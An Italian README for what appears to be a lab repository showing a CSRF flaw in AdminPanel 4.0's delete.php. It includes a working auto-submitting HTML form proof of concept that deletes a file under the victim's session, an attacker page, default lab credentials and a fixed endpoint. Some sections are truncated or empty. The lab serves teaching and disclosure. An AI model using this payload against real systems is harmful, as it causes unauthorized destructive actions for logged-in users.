
Dimostrazione educativa della vulnerabilità CSRF in un ambiente di laboratorio controllato, inclusi un exploit proof-of-concept e una versione corretta con adeguate protezioni CSRF.
ID CVE: CVE-2026-30498 (Riservato da MITRE)
Scopritore: Mehdi Ben Hamou
Esiste una vulnerabilità di Cross-Site Request Forgery (CSRF) nell'endpoint delete.php di AdminPanel 4.0.
Questa vulnerabilità consente a un attaccante di attivare azioni sensibili (eliminazione di file) per conto di un utente autenticato senza il suo consenso.
La vulnerabilità è causata dall'assenza di protezioni CSRF:
L'endpoint vulnerabile elabora le richieste direttamente in base alla sessione dell'utente senza validare l'origine della richiesta.
Lo sfruttamento riuscito porta a:
verifyPanel.phpUn attaccante ospita una pagina web dannosa che invia una richiesta falsificata:
http://localhost:8080/delete.php?file=verifyPanel.php
Quando una vittima (utente autenticato) visita questa pagina, il browser include automaticamente i cookie di sessione e la richiesta viene eseguita.
<form id="csrfForm" action="http://localhost:8080/delete.php" method="GET">
<input type="hidden" name="file" value="verifyPanel.php">
</form>
<script>
document.getElementById("csrfForm").submit();
</script>
Questa richiesta viene inviata automaticamente con il cookie di sessione della vittima.
php -S localhost:8080
http://localhost:8080
admin / admin123
http://localhost:8081/evil.html
/panel/dashboard.php
Questo repository include un ambiente di laboratorio controllato per riprodurre la vulnerabilità in sicurezza.
Importante: Questo laboratorio è una simulazione e non rappresenta il codice originale esatto di AdminPanel.
Per ripristinare l'ambiente:
/reset.php
Una versione sicura è implementata in:
delete_fixed.php
Protezioni aggiunte:
victim/
├── index.php
├── delete.php
├── delete_fixed.php
├── reset.php
└── panel/
└── dashboard.php
attacker/
└── evil.html
Questo progetto è destinato esclusivamente a scopi educativi e di ricerca.
Non utilizzare questa vulnerabilità su sistemi senza la dovuta autorizzazione.